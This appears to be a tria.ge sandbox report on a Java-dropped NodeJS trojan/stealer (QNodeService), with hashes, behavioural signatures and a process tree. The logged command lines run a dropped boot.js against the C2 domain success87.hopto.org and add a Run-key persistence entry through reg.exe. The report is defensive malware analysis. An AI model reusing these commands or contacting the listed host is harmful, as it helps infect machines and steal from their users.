Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
80s -
max time network
143s -
platform
windows10_x64 -
resource
win10 -
submitted
26/10/2020, 16:50
Static task
static1
Behavioral task
behavioral1
Sample
fsdfas.jar
Resource
win7
Behavioral task
behavioral2
Sample
fsdfas.jar
Resource
win10
General
-
Target
fsdfas.jar
-
Size
68KB
-
MD5
eeb9a3c4cc1fd0e95ff4184a50eb49d9
-
SHA1
8445135ef24533a22270fd15d9a9e767c43168e6
-
SHA256
6b9c4f7252046dbdc98d8eb537bdc776b1e35040b86c1dc1927c2e6bdd7e6c0d
-
SHA512
8533d4d2ef1fbcf7df5c452f613606df19a6271a54c4114809c3dfb21a0900e9d58474ba39da63b4bbd7aec4ed15279b81a3fcf538560e8e6bcc92781866ebcd
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 2040 node.exe 3192 node.exe 3900 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\dcab72b4-51f8-49ea-8e07-27aff8c86805 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab61-170.dat js behavioral2/files/0x000100000001ab61-173.dat js behavioral2/files/0x000100000001ab61-177.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 wtfismyip.com 29 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2040 node.exe 2040 node.exe 2040 node.exe 2040 node.exe 3192 node.exe 3192 node.exe 3192 node.exe 3192 node.exe 3900 node.exe 3900 node.exe 3900 node.exe 3900 node.exe 3900 node.exe 3900 node.exe 3900 node.exe 3900 node.exe 3900 node.exe 3900 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3944 wrote to memory of 2672 3944 java.exe 75 PID 3944 wrote to memory of 2672 3944 java.exe 75 PID 2672 wrote to memory of 2040 2672 javaw.exe 79 PID 2672 wrote to memory of 2040 2672 javaw.exe 79 PID 2040 wrote to memory of 3192 2040 node.exe 81 PID 2040 wrote to memory of 3192 2040 node.exe 81 PID 3192 wrote to memory of 3900 3192 node.exe 82 PID 3192 wrote to memory of 3900 3192 node.exe 82 PID 3900 wrote to memory of 392 3900 node.exe 84 PID 3900 wrote to memory of 392 3900 node.exe 84 PID 392 wrote to memory of 1712 392 cmd.exe 85 PID 392 wrote to memory of 1712 392 cmd.exe 85
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\fsdfas.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\57f14e08.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain success87.hopto.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kSFWED\boot.js --hub-domain success87.hopto.org4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3192 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_kSFWED\boot.js --hub-domain success87.hopto.org5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "dcab72b4-51f8-49ea-8e07-27aff8c86805" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "dcab72b4-51f8-49ea-8e07-27aff8c86805" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:1712
-
-
-
-
-
-